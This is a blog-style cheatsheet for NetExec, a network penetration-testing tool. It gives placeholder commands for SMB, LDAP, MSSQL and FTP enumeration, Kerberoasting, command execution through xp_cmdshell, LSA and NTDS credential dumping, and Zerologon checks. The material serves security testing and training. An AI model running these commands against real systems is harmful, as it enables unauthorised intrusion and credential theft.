Home Cyber security NetExec Cheatsheet : A Comprehensive Guide

NetExec Cheatsheet : A Comprehensive Guide

February 26, 2025

NetExec, also known as nxc, is a powerful network hacking tool designed to automate security assessments of large-scale networks.

It builds upon the legacy of CrackMapExec, offering enhanced functionality for penetration testers, red teamers, and cybersecurity professionals. Below is a detailed cheatsheet to help you utilize NetExec effectively.

To install NetExec:

bashsudo apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec
netexec --version

The general syntax for NetExec commands:

bashnetexec <service> <target> -u <username> -p <password>

Example for SMB:

bashnetexec smb target -u username -p password

Null Authentication: netexec smb target -u '' -p ''
Guest Authentication: netexec smb target -u 'guest' -p ''
Kerberos Authentication: netexec smb target -u username -p password -k
Basic Enumeration: netexec smb target
List Shares: netexec smb target -u username -p password --shares
List Usernames: netexec smb target -u username -p password --users

Service-Specific Commands

SMB

All-in-One Enumeration: bashnetexec smb target -u username -p password --groups --users --shares --sessions
Extracting Files: bashnetexec smb target -u username -p password --get-file target_file output_file --share sharename

LDAP

User Enumeration: netexec ldap target -u '' -p '' --users
Kerberoasting: bashnetexec ldap target -u username -p password --kerberoasting hash.txt

MSSQL

Command Execution via xp_cmdshell: bashnetexec mssql target -u username -p password -x command_to_execute

FTP

List Files: netexec ftp target -u username -p password --ls

Credential Dumping

Secrets Dump: netexec smb target -u username -p password --lsa
NTDS Extraction: bashnetexec smb target -u username -p password --ntds

Check for vulnerabilities like Zerologon or PetitPotam:

bashnetexec smb target -u username -p password -M zerologon

Webdav Check: netexec smb target -u username -p password -M webdav
BloodHound Integration: bashnetexec ldap target -u username -p password --bloodhound

Explore the official NetExec Wiki and practice labs like HackTheBox’s Mist or Rebound to refine your skills.

This cheatsheet provides a quick reference to NetExec’s core functionalities, enabling efficient network enumeration, exploitation, and post-exploitation tasks.

NetExec Cheatsheet : A Comprehensive Guide

Service-Specific Commands

SMB

LDAP

MSSQL

FTP

Credential Dumping

LEAVE A REPLY Cancel reply

APPLICATIONS

Nuclei : A Fast Tool For Configurable Targeted Scanning

CVE-2024-25153 : A Detailed Guide To Remote Code Execution In Fortra File Catalyst Workflow

Phantun : Transforms UDP Stream Into (Fake) TCP Streams That Can Go Through Layer...

CyberChef – The Ultimate Cyber Swiss Army Knife

HOT NEWS

Moriarty Project : This Tool Gives Information About The Phone Number...

EVEN MORE NEWS

AppFlowy Cloud : Enhancing Collaboration With Secure Cloud Infrastructure

Kovid-Obfuscation-Passes : Unraveling Advanced Techniques For Enhanced Code Security

FFmpeg’s asm-Lessons : Mastering Assembly For Multimedia Optimization

POPULAR CATEGORY

The Elastic Container Project – Streamlining Security Research With A Quick...

Todesstern – The Advanced Mutator Engine For Injection Vulnerability Discovery

Awesome Cybersecurity Blue Team – Empowering Defenses With Comprehensive Strategies And...